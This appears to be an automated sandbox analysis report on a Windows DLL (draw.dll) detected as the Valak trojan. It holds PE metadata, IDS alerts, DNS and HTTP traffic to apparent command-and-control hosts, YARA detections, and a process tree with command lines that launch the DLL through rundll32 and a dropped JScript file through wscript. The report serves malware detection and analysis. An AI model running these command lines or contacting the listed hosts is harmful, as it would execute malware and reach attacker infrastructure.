                                                    • [ASM] VS2008 build 21022
                                                    • [C++] VS2008 build 21022
                                                    • [ C ] VS2008 build 21022
                                                    • [IMP] VS2008 SP1 build 30729
                                                    • [EXP] VS2008 build 21022
                                                    • [RES] VS2008 build 21022
                                                    • [LNK] VS2008 build 21022
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x453a00x48.rdata
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x44bcc0x3c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x14d0000x4ec.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x14e0000x17ac.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x351c00x1c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x350000x158.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x332250x33400False0.7268149771341463data6.796375367309152IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x350000x103e80x10400False0.6549278846153846data5.757774709617991IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0x460000x1068a80x5000False0.550927734375data4.716639874488365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0x14d0000x4ec0x600False0.38671875data4.551593190209784IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x14e0000x2ff00x3000False0.4087727864583333data4.183442579206289IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                    NameRVASizeTypeLanguageCountry
                                                    RT_VERSION0x14d0a00x2f0SysEx File - IDPEnglishUnited States
                                                    RT_MANIFEST0x14d3900x15aASCII text, with CRLF line terminatorsEnglishUnited States
                                                    DLLImport
                                                    KERNEL32.dllCreateProcessW, VirtualProtectEx, CreateSemaphoreW, CloseHandle, CreateFileA, SetStdHandle, WideCharToMultiByte, InterlockedIncrement, InterlockedDecrement, InterlockedExchange, MultiByteToWideChar, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCurrentThreadId, GetCommandLineA, GetCPInfo, GetLastError, HeapFree, RtlUnwind, RaiseException, LCMapStringA, LCMapStringW, GetACP, GetOEMCP, IsValidCodePage, GetModuleHandleW, GetProcAddress, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapAlloc, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapCreate, HeapDestroy, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetStringTypeA, GetStringTypeW, WriteFile, HeapSize, VirtualAlloc, HeapReAlloc, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, GetConsoleCP, GetConsoleMode, FlushFileBuffers, ReadFile, SetFilePointer, LoadLibraryA, InitializeCriticalSectionAndSpinCount, GetLocaleInfoW, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetModuleHandleA
                                                    urlmon.dllGetComponentIDFromCLSSPEC, FindMediaTypeClass, FindMediaType, GetClassFileOrMime
                                                    NameOrdinalAddress
                                                    Productword910x100301d0

                                                    Possible Origin

                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishUnited States

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    192.168.2.3152.199.19.16149702802842995 11/30/22-08:57:37.118787TCP2842995ETPRO TROJAN Win32/Valak v33 CnC Activity M14970280192.168.2.3152.199.19.161
                                                    192.168.2.3152.199.19.16149703802842995 11/30/22-08:58:20.522210TCP2842995ETPRO TROJAN Win32/Valak v33 CnC Activity M14970380192.168.2.3152.199.19.161
                                                    192.168.2.3207.148.248.14349706802842995 11/30/22-08:59:03.257622TCP2842995ETPRO TROJAN Win32/Valak v33 CnC Activity M14970680192.168.2.3207.148.248.143
                                                    192.168.2.3152.199.19.16149704802842995 11/30/22-08:58:20.803397TCP2842995ETPRO TROJAN Win32/Valak v33 CnC Activity M14970480192.168.2.3152.199.19.161
                                                    192.168.2.3207.148.248.14349705802842995 11/30/22-08:59:02.895059TCP2842995ETPRO TROJAN Win32/Valak v33 CnC Activity M14970580192.168.2.3207.148.248.143
                                                    192.168.2.3152.199.19.16149701802842995 11/30/22-08:57:37.104764TCP2842995ETPRO TROJAN Win32/Valak v33 CnC Activity M14970180192.168.2.3152.199.19.161

                                                    Network Port Distribution

                                                    • Total Packets: 20
                                                    • 80 (HTTP)
                                                    • 53 (DNS)
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 30, 2022 08:59:02.792072058 CET4970580192.168.2.3207.148.248.143
                                                    Nov 30, 2022 08:59:02.890474081 CET8049705207.148.248.143192.168.2.3
                                                    Nov 30, 2022 08:59:02.890742064 CET4970580192.168.2.3207.148.248.143
                                                    Nov 30, 2022 08:59:02.895059109 CET4970580192.168.2.3207.148.248.143
                                                    Nov 30, 2022 08:59:02.994808912 CET8049705207.148.248.143192.168.2.3
                                                    Nov 30, 2022 08:59:02.994968891 CET4970580192.168.2.3207.148.248.143
                                                    Nov 30, 2022 08:59:03.151276112 CET4970680192.168.2.3207.148.248.143
                                                    Nov 30, 2022 08:59:03.255824089 CET8049706207.148.248.143192.168.2.3
                                                    Nov 30, 2022 08:59:03.256017923 CET4970680192.168.2.3207.148.248.143
                                                    Nov 30, 2022 08:59:03.257622004 CET4970680192.168.2.3207.148.248.143
                                                    Nov 30, 2022 08:59:03.363769054 CET8049706207.148.248.143192.168.2.3
                                                    Nov 30, 2022 08:59:03.363899946 CET4970680192.168.2.3207.148.248.143
                                                    Nov 30, 2022 08:59:12.995728970 CET8049705207.148.248.143192.168.2.3
                                                    Nov 30, 2022 08:59:12.996102095 CET4970580192.168.2.3207.148.248.143
                                                    Nov 30, 2022 08:59:13.364358902 CET8049706207.148.248.143192.168.2.3
                                                    Nov 30, 2022 08:59:13.364459038 CET4970680192.168.2.3207.148.248.143
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 30, 2022 08:57:58.546968937 CET5799053192.168.2.38.8.8.8
                                                    Nov 30, 2022 08:57:58.567497015 CET53579908.8.8.8192.168.2.3
                                                    Nov 30, 2022 08:57:59.673547983 CET5238753192.168.2.38.8.8.8
                                                    Nov 30, 2022 08:57:59.701442957 CET53523878.8.8.8192.168.2.3
                                                    Nov 30, 2022 08:58:20.418662071 CET5692453192.168.2.38.8.8.8
                                                    Nov 30, 2022 08:58:20.751039982 CET6062553192.168.2.38.8.8.8
                                                    Nov 30, 2022 08:58:41.613763094 CET4930253192.168.2.38.8.8.8
                                                    Nov 30, 2022 08:58:41.636904001 CET53493028.8.8.8192.168.2.3
                                                    Nov 30, 2022 08:58:41.888010979 CET5397553192.168.2.38.8.8.8
                                                    Nov 30, 2022 08:58:41.908310890 CET53539758.8.8.8192.168.2.3
                                                    Nov 30, 2022 08:59:02.656181097 CET5113953192.168.2.38.8.8.8
                                                    Nov 30, 2022 08:59:02.789993048 CET53511398.8.8.8192.168.2.3
                                                    Nov 30, 2022 08:59:03.031408072 CET5295553192.168.2.38.8.8.8
                                                    Nov 30, 2022 08:59:03.147399902 CET53529558.8.8.8192.168.2.3
                                                    Nov 30, 2022 08:59:10.006431103 CET6058253192.168.2.38.8.8.8
                                                    Nov 30, 2022 08:59:10.026748896 CET53605828.8.8.8192.168.2.3
                                                    Nov 30, 2022 08:59:10.126538038 CET5713453192.168.2.38.8.8.8
                                                    Nov 30, 2022 08:59:10.148607016 CET53571348.8.8.8192.168.2.3

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Nov 30, 2022 08:57:58.546968937 CET192.168.2.38.8.8.80xf2b1Standard query (0)msnbot-207-46-194-33.search.msn.comA (IP address)IN (0x0001)false
                                                    Nov 30, 2022 08:57:59.673547983 CET192.168.2.38.8.8.80x53a8Standard query (0)msnbot-207-46-194-33.search.msn.comA (IP address)IN (0x0001)false
                                                    Nov 30, 2022 08:58:20.418662071 CET192.168.2.38.8.8.80x599fStandard query (0)ec.atdmt.comA (IP address)IN (0x0001)false
                                                    Nov 30, 2022 08:58:20.751039982 CET192.168.2.38.8.8.80x9a2eStandard query (0)ec.atdmt.comA (IP address)IN (0x0001)false
                                                    Nov 30, 2022 08:58:41.613763094 CET192.168.2.38.8.8.80x7e8eStandard query (0)a-zcorner.comA (IP address)IN (0x0001)false
                                                    Nov 30, 2022 08:58:41.888010979 CET192.168.2.38.8.8.80x5e81Standard query (0)a-zcorner.comA (IP address)IN (0x0001)false
                                                    Nov 30, 2022 08:59:02.656181097 CET192.168.2.38.8.8.80x4d29Standard query (0)knockoutlights.comA (IP address)IN (0x0001)false
                                                    Nov 30, 2022 08:59:03.031408072 CET192.168.2.38.8.8.80x1411Standard query (0)knockoutlights.comA (IP address)IN (0x0001)false
                                                    Nov 30, 2022 08:59:10.006431103 CET192.168.2.38.8.8.80x4025Standard query (0)organicgreensfl.comA (IP address)IN (0x0001)false
                                                    Nov 30, 2022 08:59:10.126538038 CET192.168.2.38.8.8.80x79f7Standard query (0)organicgreensfl.comA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Nov 30, 2022 08:57:58.567497015 CET8.8.8.8192.168.2.30xf2b1Name error (3)msnbot-207-46-194-33.search.msn.comnonenoneA (IP address)IN (0x0001)false
                                                    Nov 30, 2022 08:57:59.701442957 CET8.8.8.8192.168.2.30x53a8Name error (3)msnbot-207-46-194-33.search.msn.comnonenoneA (IP address)IN (0x0001)false
                                                    Nov 30, 2022 08:58:20.444433928 CET8.8.8.8192.168.2.30x599fNo error (0)ec.atdmt.comatlasdmt.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                    Nov 30, 2022 08:58:20.774518967 CET8.8.8.8192.168.2.30x9a2eNo error (0)ec.atdmt.comatlasdmt.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                    Nov 30, 2022 08:58:41.636904001 CET8.8.8.8192.168.2.30x7e8eName error (3)a-zcorner.comnonenoneA (IP address)IN (0x0001)false
                                                    Nov 30, 2022 08:58:41.908310890 CET8.8.8.8192.168.2.30x5e81Name error (3)a-zcorner.comnonenoneA (IP address)IN (0x0001)false
                                                    Nov 30, 2022 08:59:02.789993048 CET8.8.8.8192.168.2.30x4d29No error (0)knockoutlights.com207.148.248.143A (IP address)IN (0x0001)false
                                                    Nov 30, 2022 08:59:03.147399902 CET8.8.8.8192.168.2.30x1411No error (0)knockoutlights.com207.148.248.143A (IP address)IN (0x0001)false
                                                    Nov 30, 2022 08:59:10.026748896 CET8.8.8.8192.168.2.30x4025Name error (3)organicgreensfl.comnonenoneA (IP address)IN (0x0001)false
                                                    Nov 30, 2022 08:59:10.148607016 CET8.8.8.8192.168.2.30x79f7Name error (3)organicgreensfl.comnonenoneA (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • knockoutlights.com

                                                    Statistics

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:08:55:05
                                                    Start date:30/11/2022
                                                    Path:C:\Windows\System32\loaddll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:loaddll32.exe "C:\Users\user\Desktop\draw.dll"
                                                    Imagebase:0x9e0000
                                                    File size:116736 bytes
                                                    MD5 hash:1F562FBF37040EC6C43C8D5EF619EA39
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery, Description: Detects JS potentially executing WMI queries, Source: 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:moderate
                                                    Show Windows behavior

                                                    File Activities


                                                    General

                                                    Target ID:1
                                                    Start time:08:55:05
                                                    Start date:30/11/2022
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff745070000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Target ID:2
                                                    Start time:08:55:06
                                                    Start date:30/11/2022
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\draw.dll",#1
                                                    Imagebase:0xb0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                    General

                                                    Target ID:3
                                                    Start time:08:55:06
                                                    Start date:30/11/2022
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:rundll32.exe C:\Users\user\Desktop\draw.dll,Productword9
                                                    Imagebase:0x1300000
                                                    File size:61952 bytes
                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000003.00000003.535269013.0000000001190000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery, Description: Detects JS potentially executing WMI queries, Source: 00000003.00000003.535269013.0000000001190000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:high
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                    General

                                                    Target ID:4
                                                    Start time:08:55:06
                                                    Start date:30/11/2022
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\draw.dll",#1
                                                    Imagebase:0x1300000
                                                    File size:61952 bytes
                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery, Description: Detects JS potentially executing WMI queries, Source: 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:high

                                                    File Activities


                                                    General

                                                    Target ID:12
                                                    Start time:08:57:23
                                                    Start date:30/11/2022
                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:wscript.exe //E:jscript "C:\Users\Public\iVIwVADQD.eLxan
                                                    Imagebase:0x1120000
                                                    File size:147456 bytes
                                                    MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 0000000C.00000002.769445270.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 0000000C.00000003.663643714.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 0000000C.00000002.768788534.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                    General

                                                    Target ID:16
                                                    Start time:08:57:24
                                                    Start date:30/11/2022
                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:wscript.exe //E:jscript "C:\Users\Public\iVIwVADQD.eLxan
                                                    Imagebase:0x1120000
                                                    File size:147456 bytes
                                                    MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000010.00000002.768676273.0000000000708000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high

                                                    Disassembly

                                                    No disassembly